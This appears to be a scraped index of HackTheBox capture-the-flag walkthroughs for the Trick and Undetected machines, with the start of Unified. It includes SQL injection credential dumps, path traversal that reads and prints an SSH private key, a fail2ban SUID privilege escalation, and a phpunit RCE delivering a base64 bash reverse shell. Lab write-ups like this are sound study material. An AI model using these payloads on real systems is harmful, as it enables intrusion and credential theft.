    Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-19 13:31 EDT\nNmap scan report for trick.htb (10.10.11.166)\nHost is up (0.15s latency).\nNot shown: 996 closed tcp ports (reset)\nPORT   STATE SERVICE\n22/tcp open  ssh\n25/tcp open  smtp\n53/tcp open  domain\n80/tcp open  http\n

    Once you know open ports, run nmap to see service versions and more details:

    nmap -sCV -p22,80,53,25 -oN targeted $ip\n

    Results:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey:\n|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)\n|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)\n|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)\n25/tcp open  smtp    Postfix smtpd\n|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)\n| dns-nsid:\n|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian\n80/tcp open  http    nginx 1.14.2\n|_http-title: Coming Soon - Start Bootstrap Theme\n|_http-server-header: nginx/1.14.2\nService Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration","title":"Directory enumeration","text":"

    We can use gobuster to enumerate directories:

    gobuster dir -u $ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#dns-enumeration","title":"dns enumeration","text":"

    Run:

nslookup\n

    And after that:

    > SERVER 10.10.11.166\n

    Results:

    Default server: 10.10.11.166\nAddress: 10.10.11.166#53\n

    Then, we run:

    > 10.10.11.166\n

    And as a result, we have:

    166.11.10.10.in-addr.arpa       name = trick.htb.\n

Now we have a DNS name: trick.htb. We can attempt a zone transfer (axfr) with dig:

    dig trick.htb axfr @10.10.11.166\n

    And the results:

    ; <<>> DiG 9.18.6-2-Debian <<>> trick.htb axfr @10.10.11.166\n;; global options: +cmd\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\ntrick.htb.              604800  IN      NS      trick.htb.\ntrick.htb.              604800  IN      A       127.0.0.1\ntrick.htb.              604800  IN      AAAA    ::1\npreprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\n;; Query time: 96 msec\n;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)\n;; WHEN: Wed Oct 19 13:20:24 EDT 2022\n;; XFR size: 6 records (messages 1, bytes 231)\n

Finally, we have these DNS names: + trick.htb + preprod-payroll.trick.htb + root.trick.htb

    ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file","title":"Edit /etc/hosts file","text":"

    We add the given subdomain to our /etc/hosts file. First we open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n
    We move the cursor to the end and we add these lines:

    10.10.11.166    trick.htb\n10.10.11.166    preprod-payroll.trick.htb\n10.10.11.166    root.trick.htb\n

    Now we can use the browser to go to: http://preprod-payroll.trick.htb

    And start again with directory enumeration.

    ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration_1","title":"Directory enumeration","text":"

    Run the dictionary:

    gobuster dir -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n

    Results:

    Dirs found with a 302 response:\n\n/\n\nDirs found with a 403 response:\n\n/assets/\n/database/\n/assets/vendor/\n/assets/img/\n/assets/vendor/jquery/\n/assets/DataTables/\n/assets/vendor/bootstrap/\n/assets/vendor/bootstrap/js/\n/assets/vendor/jquery.easing/\n/assets/css/\n/assets/vendor/php-email-form/\n/assets/vendor/venobox/\n/assets/vendor/waypoints/\n/assets/vendor/counterup/\n/assets/vendor/owl.carousel/\n/assets/vendor/bootstrap-datepicker/\n/assets/vendor/bootstrap-datepicker/js/\n/assets/js/\n/assets/font-awesome/\n/assets/font-awesome/js/\n/assets/vendor/owl.carousel/assets/\n/assets/vendor/bootstrap/css/\n/assets/vendor/bootstrap-datepicker/css/\n/assets/font-awesome/css/\n/assets/vendor/bootstrap-datepicker/locales/\n/assets/font-awesome/less/\n\n\n--------------------------------\nFiles found during testing:\n\nFiles found with a 302 responce:\n\n/index.php\n\nFiles found with a 200 responce:\n\n/login.php\n/home.php\n/header.php\n/users.php\n/ajax.php\n/navbar.php\n/assets/vendor/jquery/jquery.min.js\n/assets/DataTables/datatables.min.js\n/assets/vendor/bootstrap/js/bootstrap.bundle.min.js\n/assets/vendor/jquery.easing/jquery.easing.min.js\n/assets/vendor/php-email-form/validate.js\n/assets/vendor/venobox/venobox.min.js\n/assets/vendor/waypoints/jquery.waypoints.min.js\n/assets/vendor/counterup/counterup.min.js\n/assets/vendor/owl.carousel/owl.carousel.min.js\n/assets/js/select2.min.js\n/assets/vendor/bootstrap-datepicker/js/bootstrap-datepicker.min.js\n/assets/js/jquery.datetimepicker.full.min.js\n/assets/js/jquery-te-1.4.0.min.js\n/assets/font-awesome/js/all.min.js\n/department.php\n/topbar.php\n/position.php\n/employee.php\n/payroll.php\n

    In http://preprod-payroll.trick.htb/users.php there is this info:

    name: Administrator\nusername: Enemigosss\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#exploiting-a-sql-injection-vulnerability","title":"Exploiting a sql injection vulnerability","text":"

If we capture the login request at http://preprod-payroll.trick.htb/login.php (saved here to a file named login, which sqlmap reads with -r) and run sqlmap on it, we'll see that it is vulnerable to blind SQL injection.

    We can extract databases:

    sqlmap -r login --dbs\n

    Results:

    available databases [2]:\n[*] information_schema\n[*] payroll_db\n

    Now, we extract tables from payroll_db database:

    sqlmap -r login -D payroll_db --tables\n

    Results:

    Database: payroll_db\n[11 tables]\n+---------------------+\n| position            |\n| allowances          |\n| attendance          |\n| deductions          |\n| department          |\n| employee            |\n| employee_allowances |\n| employee_deductions |\n| payroll             |\n| payroll_items       |\n| users               |\n+---------------------+\n

    Next, we get columns from the users table:

    sqlmap -r login -D payroll_db -T users --columns\n

    Results:

    Database: payroll_db\nTable: users\n[8 columns]\n+-----------+--------------+\n| Column    | Type         |\n+-----------+--------------+\n| address   | text         |\n| contact   | text         |\n| doctor_id | int(30)      |\n| id        | int(30)      |\n| name      | varchar(200) |\n| password  | varchar(200) |\n| type      | tinyint(1)   |\n| username  | varchar(100) |\n+-----------+--------------+\n

    And finally we can get usernames and passwords:

    sqlmap -r login -D payroll_db -T users -C username,password --dump\n

    Results:

    Database: payroll_db\nTable: users\n[1 entry]\n+------------+-----------------------+\n| username   | password              |\n+------------+-----------------------+\n| Enemigosss | SuperGucciRainbowCake |\n+------------+-----------------------+\n

We can log in at http://preprod-payroll.trick.htb and see an administration panel, but other than information disclosure, we cannot find a vulnerability to get into the server.

    ","tags":["walkthrough"]},{"location":"htb-trick/#dns-fuzzing","title":"DNS fuzzing","text":"

Since the subdomain name (http://preprod-payroll.trick.htb/) looks interesting, as "payroll" could be replaced with another word, we consider fuzzing it. First, we need to figure out the response size for a query to a non-existent subdomain. Then we fuzz for subdomains.

curl -s -H \"Host: nonexistent.trick.htb\" http://trick.htb | wc -c\n

And it returns 5480, which is the filter we will use in the ffuf command.

Now we can keep enumerating subdomains with ffuf:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000-trick.txt -u http://trick.htb -H \"Host: FUZZ.trick.htb\" -fs 5480\n

Adding -fs 5480 to the command filters out responses that are 5480 bytes long (the non-existent subdomains), so we can pinpoint real findings.

    ffuf -H \"Host: preprod-FUZZ.trick.htb\" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.166 -fs 5480\n

    Adding the filter reveals a new subdomain called preprod-marketing. Results:

            /'___\\  /'___\\           /'___\\       \n       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       \n       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      \n         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       \n          \\/_/    \\/_/   \\/___/    \\/_/       \n\n       v1.5.0 Kali Exclusive <3\n________________________________________________\n\n :: Method           : GET\n :: URL              : http://10.10.11.166\n :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n :: Header           : Host: preprod-FUZZ.trick.htb\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500\n :: Filter           : Response size: 5480\n________________________________________________\n\nmarketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 267ms]\npc169                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 212ms]\npayroll                 [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 116ms]\n77msccom                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 183ms\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file_1","title":"Edit /etc/hosts file","text":"

    We add the given subdomain to our /etc/hosts file. First we open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n

    We move the cursor to the end and we add these lines:

    10.10.11.166    preprod-marketing.trick.htb\n

We enter the address in the browser and can see a website. On one of the pages there is a path traversal vulnerability; the ..././ sequence defeats a filter that strips ../ once, since removing it still leaves ../ behind:

    http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././etc/passwd\n

    Results:

    root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\ntss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false\ndnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nusbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\nrtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\npulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\nspeech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\nsaned:x:112:121::/var/lib/saned:/usr/sbin/nologin\ncolord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\ngeoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin\nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nDebian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false\nsshd:x:118:65534::/run/sshd:/usr/sbin/nologin\npostfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin\nbind:x:120:128::/var/cache/bind:/usr/sbin/nologin\nmichael:x:1001:1001::/home/michael:/bin/bash\n

    Now we can guess that in /home/michael there is a .ssh folder with the id_rsa private SSH key. To download it, we can use Burp and capture this request:

    http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa\n

    As a result, we can download michael's private key and log in via SSH:

    HTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 20 Oct 2022 08:25:41 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nContent-Length: 1823\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz\nc4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G\nYQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+\n4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/\nUkn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4\n1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC\nDkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0\n+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE\nhkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L\njnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6\nIqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C\naUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/\nKwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC\ntnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge\nU+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0\nfHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V\nPH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS\n3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA\nfvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT\nAuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn\nIn16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP\nJkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN\njsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+\nIJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n
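
    Alternatively, the key can be fetched directly with curl instead of Burp (a minimal sketch, not part of the original capture):

    curl -s \"http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa\" -o key\n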

    Save the key to a file (if you pasted it from Burp) and restrict its permissions:

    nano key\n# CTRL-SHIFT-V to paste it\n# CTRL-X, then Y and ENTER to save the buffer and exit\nchmod 400 key\n

    And we can login as michael:

    ssh -i key michael@10.10.11.166\n

    In /home/michael we have the user flag: user.txt.

    ","tags":["walkthrough"]},{"location":"htb-trick/#escalation-of-privileges","title":"Escalation of privileges","text":"

    Getting the system flag. Check michael's groups:

    id\n

    Results:

    uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)\n

    Check michael's permissions:

    sudo -l\n

    Results:

    Matching Defaults entries for michael on trick:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n\nUser michael may run the following commands on trick:\n    (root) NOPASSWD: /etc/init.d/fail2ban restart\n

    The interesting part here is that michael may run the fail2ban restart command as root without any password. This is a misconfiguration and we can exploit it.

    For starters, michael has write permission on the directory that holds the action configuration files, /etc/fail2ban/action.d.

    Run:

    ls -la /etc/fail2ban\n

    And we can see that michael, as a member of the security group, has rwx rights on the action.d directory owned by root:

    ...\ndrwxrwx---   2 root security  4096 Oct 20 11:03 action.d\n...\n

    Now we need to understand what fail2ban is and how it works. fail2ban is a great IDPS tool: not only can it detect attacks, it can also block malicious IP addresses using Linux iptables. Although fail2ban can be used for services like HTTP, SMTP, IMAP, etc., most sysadmins use it to protect the SSH service. The fail2ban daemon reads the log files, and if a malicious pattern is detected (e.g. multiple failed login requests) it executes a command to block the IP for a certain period of time, or forever.

    In the file /etc/fail2ban/jail.conf, we can spot some customizations such as ban time and maxretry:

    cat /etc/fail2ban/jail.conf\n

    And we see that bantime is set to 10 seconds and the maximum number of retries to 5:

    # \"bantime\" is the number of seconds that a host is banned.\nbantime  = 10s\n\n# A host is banned if it has generated \"maxretry\" during the last \"findtime\"\n# seconds.\nfindtime  = 10s\n\n# \"maxretry\" is the number of failures before a host gets banned.\nmaxretry = 5\n

    This means that if we fail the SSH login six times (exceeding the maxretry parameter), the ban action defined in /etc/fail2ban/action.d/iptables-multiport.conf will be executed as root and, as a consequence, our host will be banned. Now, as part of the security group michael does have rwx permissions on the parent folder /etc/fail2ban/action.d, but not on the file /etc/fail2ban/action.d/iptables-multiport.conf:

    ls -la /etc/fail2ban/action.d/iptables-multiport.conf\n

    Result:

    -rw-r--r-- 1 root root 1420 Oct 20 12:48 iptables-multiport.conf\n

    We therefore need a way to edit that file and include our malicious code. Since the fail2ban service is restarted every minute or so, you need to execute the following commands quickly. They replace /etc/fail2ban/action.d/iptables-multiport.conf with a copy we own and can edit:

    # move the root-owned file aside (possible because we have write permission on the directory)\nmv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak\n# recreate the file as a copy we own and can edit\ncp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf\n# edit the file and add your lines\nnano /etc/fail2ban/action.d/iptables-multiport.conf\n# In the file, comment out the line with the actionban definition and add:\n# actionban = chmod +s /bin/bash\n# Also comment out the line with the actionunban definition and add:\n# actionunban = chmod +s /bin/bash\n# CTRL-X, then Y and ENTER to save changes.\n
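
    After the edit, the relevant lines of iptables-multiport.conf should look roughly like this (a sketch; the original iptables commands remain commented out):

    # actionban = <original iptables command, commented out>\nactionban = chmod +s /bin/bash\n\n# actionunban = <original iptables command, commented out>\nactionunban = chmod +s /bin/bash\n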

    With \"chmod +s /bin/bash\" we're going to give the suid bit to bash. The suid bit provides the user running it the same privileges that the user who created it. In this case, root is the user who created it. If we run it, we'll have root privileges during its execution. The next step is restarting the service to get the file iptables-multiport.conf updated.

    sudo /etc/init.d/fail2ban restart\n

    Now, when we fail to log in over SSH more than 5 times, the configuration set in iptables-multiport.conf will take effect. To trigger it, from the attacker command line:

    1. Install sshpass, a program that lets us supply the SSH password on the command line, so the login attempts can be automated:
    sudo apt install sshpass\n
    1. Write a script on the attacker machine:
    nano wronglogin.sh\n
    #!/bin/bash\n\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\n
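
    Equivalently, a shorter loop-based version of the script (a sketch, assuming sshpass is installed):

    #!/bin/bash\n# Fail six SSH logins to exceed maxretry and trigger the ban action\nfor i in $(seq 1 6); do\n    sshpass -p \"wrongpassword\" ssh -o StrictHostKeyChecking=no michael@10.10.11.166\ndone\n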

    Add execution permission:

    chmod +x wronglogin.sh\n
    1. Launch the script:
    ./wronglogin.sh\n

    Once the script has executed, the SUID bit will be set on /bin/bash. Run:

     ls -l /bin/bash\n

    And you will see:

    -rwsr-sr-x 1 root root 1168776 Oct 20  2022 /bin/bash\n

    Now if we run:

    bash -p\n

    The -p flag turns on privileged mode. In this mode, the $BASH_ENV and $ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS, BASHOPTS, CDPATH and GLOBIGNORE variables, if they appear in the environment, are ignored. The result:

    michael@trick:~$ bash -p\nbash-5.0# id\nuid=1001(michael) gid=1001(michael) euid=0(root) egid=0(root) groups=0(root),1001(michael),1002(security)\nbash-5.0# cd /root\nbash-5.0# ls\nf2b.sh  fail2ban  root.txt  set_dns.sh\n

    To display the system flag:

    cat root.txt\n
    ","tags":["walkthrough"]},{"location":"htb-undetected/","title":"HTB undetected","text":"
    nmap -sV -sC -Pn $ip --top-ports 4250\n

    Open ports: 22 and 80.

    Entering the IP in a browser we get to a website.

    Reviewing the source code, we see that the \"Store\" menu links to http://store.djewelry.htb/.

    Another way to find out:

    # with gobuster\ngobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt \n
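
    The same wordlist can also be used for virtual host fuzzing over HTTP (a sketch; the -fs size filter is an assumption and must be adjusted to the size of the default catch-all response):

    ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://djewelry.htb -H \"Host: FUZZ.djewelry.htb\" -fs 4242\n# -fs: filter out responses of this size (replace 4242 with the default response size)\n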

    Open /etc/hosts and add a line mapping the IP to store.djewelry.htb and djewelry.htb.

    After browsing around both websites we find nothing notable, so we fuzz directories on both domains:

    # With wfuzz\nwfuzz -c --hc 404 -t 200 -u http://store.djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n\nwfuzz -c --hc 404 -t 200 -u http://djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n

    Nothing interesting under the main domain, but on http://store.djewelry.htb:

    ********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http://store.djewelry.htb/FUZZ\nTotal requests: 4614\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                    \n=====================================================================\n\n000000001:   200        195 L    475 W      6203 Ch     \"http://store.djewelry.htb/\n                                                        \"                          \n000000013:   403        9 L      28 W       283 Ch      \".htpasswd\"                \n000000012:   403        9 L      28 W       283 Ch      \".htaccess\"                \n000000011:   403        9 L      28 W       283 Ch      \".hta\"                     \n000001114:   301        9 L      28 W       322 Ch      \"css\"                      \n000001648:   301        9 L      28 W       324 Ch      \"fonts\"                    \n000002021:   200        195 L    475 W      6203 Ch     \"index.php\"                \n000001991:   301        9 L      28 W       325 Ch      \"images\"                   \n000002179:   301        9 L      28 W       321 Ch      \"js\"                       \n000003588:   403        9 L      28 W       283 Ch      \"server-status\"            \n000004286:   301        9 L      28 W       325 Ch      \"vendor\"                   \n\nTotal time: 0\nProcessed Requests: 4614\nFiltered Requests: 4603\nRequests/sec.: 0\n

    /vendor has directory listing enabled, so we can browse all files and folders under it.

    After browsing for a while, we find the list of all installed packages and their versions at http://store.djewelry.htb/vendor/composer/installed.json. The vulnerable package is \"phpunit/phpunit\" version \"5.6.2\".

    Some exploits:

    https://blog.ovhcloud.com/cve-2017-9841-what-is-it-and-how-do-we-protect-our-customers/

    In my case:

    curl -XGET --data \"<?php system('whoami');?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n
    www-data\n

    Now, we can get a reverse shell:

    My reverse shell before base64-encoding it: \"bash -i >& /dev/tcp/10.10.14.2/4444 0>&1\".
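
    The base64 string used in the request below can be reproduced like this:

    echo 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1' | base64\n# YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzQ0NDQgMD4mMQo=\n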

    curl -XGET --data \"<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzQ0NDQgMD4mMQo=|base64 -d|bash'); ?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n

    See a walkthrough: https://0xdf.gitlab.io/2022/07/02/htb-undetected.html

    "},{"location":"htb-unified/","title":"Walkthrough - Unified - A HackTheBox machine","text":"

    Enumerate open services:

    nmap -sC -sV $ip -Pn\n

    Results:

    PORT     STATE SERVICE         VERSION\n22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=\n|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=\n|   256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR\n6789/tcp open  ibm-db2-admin?\n8080/tcp open  http-proxy\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to https://10.129.96.149:8443/manage\n| fingerprint-strings: \n|   FourOhFourRequest: \n|     HTTP/1.1 404 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 431\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 404 \n|     Found</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 \n|     Found</h1></body></html>\n|   GetRequest, HTTPOptions: \n|     HTTP/1.1 302 \n|     Location: http://localhost:8080/manage\n|     Content-Length: 0\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|   RTSPRequest, Socks5: \n|     HTTP/1.1 400 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 435\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 400 \n|     Request</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 \n|_    